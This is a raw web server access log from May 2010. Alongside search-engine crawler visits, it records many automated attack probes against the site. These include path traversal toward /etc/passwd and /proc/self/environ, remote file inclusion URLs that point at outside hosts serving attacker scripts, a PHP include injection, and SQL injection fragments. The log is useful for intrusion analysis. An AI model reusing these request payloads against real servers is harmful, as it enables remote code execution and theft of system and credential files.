67.18.19.146 - - [20/May/2010:00:47:36 -0500] "GET //index.php?option=daerew_45galleryGD&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
62.146.125.2 - - [20/May/2010:00:50:26 -0500] "GET //include/mail.inc.php?root=http://sior.org/zero/data/home/id? HTTP/1.1" 404 305 "-""libwww-perl/5.800"
87.250.255.243 - - [20/May/2010:00:50:30 -0500] "GET /logs/access_log.1205539200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
208.115.111.248 - - [20/May/2010:00:51:32 -0500] "GET /logs/access_log.1220140800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:00:51:34 -0500] "GET /logs/access_log.1220313600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:00:51:37 -0500] "GET /logs/access_log.1220400000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:00:51:39 -0500] "GET /logs/access_log.1220745600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:00:51:41 -0500] "GET /logs/access_log.1221004800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:00:51:44 -0500] "GET /logs/access_log.1221350400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:00:51:46 -0500] "GET /logs/access_log.1221523200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:00:51:48 -0500] "GET /logs/access_log.1221696000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:00:51:51 -0500] "GET /logs/access_log.1221782400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [20/May/2010:00:51:53 -0500] "GET /logs/access_log.1221955200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
88.191.94.188 - - [20/May/2010:00:55:31 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
80.65.166.74 - - [20/May/2010:00:56:55 -0500] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
80.65.166.74 - - [20/May/2010:00:56:55 -0500] "GET /logs/access_log.1273363200/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
80.65.166.74 - - [20/May/2010:00:56:55 -0500] "GET /logs/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
80.65.166.74 - - [20/May/2010:00:56:56 -0500] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
80.65.166.74 - - [20/May/2010:00:56:56 -0500] "GET /logs/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
80.65.166.74 - - [20/May/2010:00:56:56 -0500] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
80.65.166.74 - - [20/May/2010:00:56:56 -0500] "GET /logs/access_log.1273363200/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
80.65.166.74 - - [20/May/2010:00:56:56 -0500] "GET /logs/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
80.65.166.74 - - [20/May/2010:00:56:56 -0500] "GET /logs/access_log.1273363200/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
80.65.166.74 - - [20/May/2010:00:56:58 -0500] "GET /logs/access_log.1273363200/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
80.65.166.74 - - [20/May/2010:00:56:58 -0500] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
80.65.166.74 - - [20/May/2010:00:56:58 -0500] "GET /logs/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
80.65.166.74 - - [20/May/2010:00:56:59 -0500] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
80.65.166.74 - - [20/May/2010:00:56:59 -0500] "GET /logs/access_log.1273363200/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
80.65.166.74 - - [20/May/2010:00:56:59 -0500] "GET /logs/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
87.250.255.243 - - [20/May/2010:00:57:12 -0500] "GET /logs/access_log.1206489600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
83.69.115.198 - - [20/May/2010:00:57:47 -0500] "GET /logs/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
83.69.115.198 - - [20/May/2010:00:57:47 -0500] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
83.69.115.198 - - [20/May/2010:00:57:47 -0500] "GET /logs/access_log.1273363200/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
83.69.115.198 - - [20/May/2010:00:57:48 -0500] "GET /hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 291 "-""Mozilla/5.0"
83.69.115.198 - - [20/May/2010:00:57:48 -0500] "GET /logs/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 296 "-""Mozilla/5.0"
83.69.115.198 - - [20/May/2010:00:57:48 -0500] "GET /logs/access_log.1273363200/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
83.69.115.198 - - [20/May/2010:00:58:29 -0500] "GET /logs/access_log.1272844800/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
83.69.115.198 - - [20/May/2010:00:59:19 -0500] "GET /logs/access_log.1272844800/hw3.php?daysonly=0).include($_GET[file]).(0&file=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 318 "-""Mozilla/5.0"
207.46.204.243 - - [20/May/2010:01:00:35 -0500] "GET /logs/access_log.1249171200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [20/May/2010:01:02:45 -0500] "GET /tattoo/set1.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
119.235.237.92 - - [20/May/2010:01:02:59 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)"
119.235.237.92 - - [20/May/2010:01:02:59 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)"
88.191.94.188 - - [20/May/2010:01:03:58 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:03:59 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:03:59 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
83.96.228.90 - - [20/May/2010:01:04:01 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
83.96.228.90 - - [20/May/2010:01:04:01 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
83.96.228.90 - - [20/May/2010:01:04:01 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
83.96.228.90 - - [20/May/2010:01:04:01 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
83.96.228.90 - - [20/May/2010:01:04:02 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
83.96.228.90 - - [20/May/2010:01:04:02 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
83.96.228.90 - - [20/May/2010:01:04:02 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
83.96.228.90 - - [20/May/2010:01:04:02 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
83.96.228.90 - - [20/May/2010:01:04:02 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
83.96.228.90 - - [20/May/2010:01:04:02 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
83.96.228.90 - - [20/May/2010:01:04:02 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
83.96.228.90 - - [20/May/2010:01:04:02 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
83.96.228.90 - - [20/May/2010:01:04:30 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
83.96.228.90 - - [20/May/2010:01:04:32 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
83.96.228.90 - - [20/May/2010:01:04:32 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
83.96.228.90 - - [20/May/2010:01:04:33 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
83.96.228.90 - - [20/May/2010:01:04:33 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
83.96.228.90 - - [20/May/2010:01:04:37 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
83.96.228.90 - - [20/May/2010:01:04:38 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
83.96.228.90 - - [20/May/2010:01:04:38 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:05:51 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:05:51 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:05:51 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:06:52 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:06:53 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:06:53 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:06:53 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:06:53 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
207.46.204.177 - - [20/May/2010:01:07:06 -0500] "GET /logs/access_log.1258588800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
88.191.94.188 - - [20/May/2010:01:07:41 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:01:08:18 -0500] "GET /logs/access_log.1221523200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
88.191.94.188 - - [20/May/2010:01:08:18 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:08:18 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:08:19 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:08:26 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:08:26 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:08:26 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:08:30 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:08:30 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:08:31 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:08:35 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:08:36 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:08:36 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:08:41 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:08:43 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:08:43 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:08:43 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:08:44 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:08:46 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:08:51 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
88.191.94.188 - - [20/May/2010:01:09:01 -0500] "GET /logs/access_log.1273017600/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
74.55.52.154 - - [20/May/2010:01:12:57 -0500] "GET /*mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 312 "-""libwww-perl/5.805"
74.55.52.154 - - [20/May/2010:01:12:57 -0500] "GET /logs/*mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 317 "-""libwww-perl/5.805"
81.21.79.214 - - [20/May/2010:01:13:45 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [20/May/2010:01:13:45 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [20/May/2010:01:13:45 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
183.80.125.164 - - [20/May/2010:01:14:10 -0500] "GET /logs/access_log.1264982400+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
188.122.78.2 - - [20/May/2010:01:14:23 -0500] "GET /logs/access_log.1273276800/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.122.78.2 - - [20/May/2010:01:14:23 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
188.122.78.2 - - [20/May/2010:01:14:23 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
183.80.125.164 - - [20/May/2010:01:14:33 -0500] "GET /logs/access_log.1263340800+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
211.239.161.143 - - [20/May/2010:01:14:57 -0500] "GET /pivot/modules/module_db.php?pivot_path=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 311 "-""libwww-perl/5.79"
211.239.161.143 - - [20/May/2010:01:14:58 -0500] "GET /logs/pivot/modules/module_db.php?pivot_path=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 316 "-""libwww-perl/5.79"
183.80.125.164 - - [20/May/2010:01:15:00 -0500] "GET /logs/access_log.1266278400+and+0=1+union+select+ HTTP/1.1" 404 332 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)"
81.21.79.214 - - [20/May/2010:01:15:09 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [20/May/2010:01:15:10 -0500] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [20/May/2010:01:15:10 -0500] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
58.230.162.220 - - [20/May/2010:01:15:27 -0500] "GET /?_zb_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
58.230.162.220 - - [20/May/2010:01:15:27 -0500] "GET /logs/access_log.1265587200/?_zb_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.230.162.220 - - [20/May/2010:01:15:27 -0500] "GET /logs/access_log.1264118400/?_zb_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
58.230.162.220 - - [20/May/2010:01:15:27 -0500] "GET /logs/?_zb_path=http://howtolisten.kr//sarangbi_bgm/id1.txt?? HTTP/1.1" 200 6273 "-""Mozilla/5.0"
195.20.225.28 - - [20/May/2010:01:15:52 -0500] "GET /install/index.php?lng=../../include/main.inc&G_PATH=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 301 "-""libwww-perl/5.805"
195.20.225.28 - - [20/May/2010:01:15:52 -0500] "GET /logs/install/index.php?lng=../../include/main.inc&G_PATH=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 306 "-""libwww-perl/5.805"
87.106.26.60 - - [20/May/2010:01:16:11 -0500] "GET /include/new-visitor.inc.php?lvc_include_dir=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
87.106.26.60 - - [20/May/2010:01:16:11 -0500] "GET /logs/include/new-visitor.inc.php?lvc_include_dir=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
81.21.79.214 - - [20/May/2010:01:16:21 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.106.26.60 - - [20/May/2010:01:16:41 -0500] "GET /include/new-visitor.inc.php?lvc_include_dir=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 311 "-""libwww-perl/5.805"
87.106.26.60 - - [20/May/2010:01:16:41 -0500] "GET /logs/include/new-visitor.inc.php?lvc_include_dir=http://robots.interfree.it/id.jpg?? HTTP/1.1" 404 316 "-""libwww-perl/5.805"
87.250.255.243 - - [20/May/2010:01:16:47 -0500] "GET /logs/access_log.1260921600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
62.146.125.2 - - [20/May/2010:01:17:47 -0500] "GET /logs/access_log.1272844800//include/mail.inc.php?root=http://sior.org/zero/data/home/id? HTTP/1.1" 404 332 "-""libwww-perl/5.800"
62.146.125.2 - - [20/May/2010:01:17:47 -0500] "GET //include/mail.inc.php?root=http://sior.org/zero/data/home/id? HTTP/1.1" 404 305 "-""libwww-perl/5.800"
62.146.125.2 - - [20/May/2010:01:17:47 -0500] "GET /logs//include/mail.inc.php?root=http://sior.org/zero/data/home/id? HTTP/1.1" 404 310 "-""libwww-perl/5.800"
82.98.135.6 - - [20/May/2010:01:17:54 -0500] "GET /logs/access_log.1265414400//bbs/write_update.php?board_skin_path=http://www.easyconsciousliving.com//administrator/components/com_alfcontact/idxx.txt??? HTTP/1.1" 404 332 "-""Mozilla/5.0"
82.98.135.6 - - [20/May/2010:01:17:54 -0500] "GET //bbs/write_update.php?board_skin_path=http://www.easyconsciousliving.com//administrator/components/com_alfcontact/idxx.txt??? HTTP/1.1" 404 305 "-""Mozilla/5.0"
82.98.135.6 - - [20/May/2010:01:17:54 -0500] "GET /logs//bbs/write_update.php?board_skin_path=http://www.easyconsciousliving.com//administrator/components/com_alfcontact/idxx.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
81.21.79.214 - - [20/May/2010:01:18:28 -0500] "GET /logs/access_log.1273363200/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
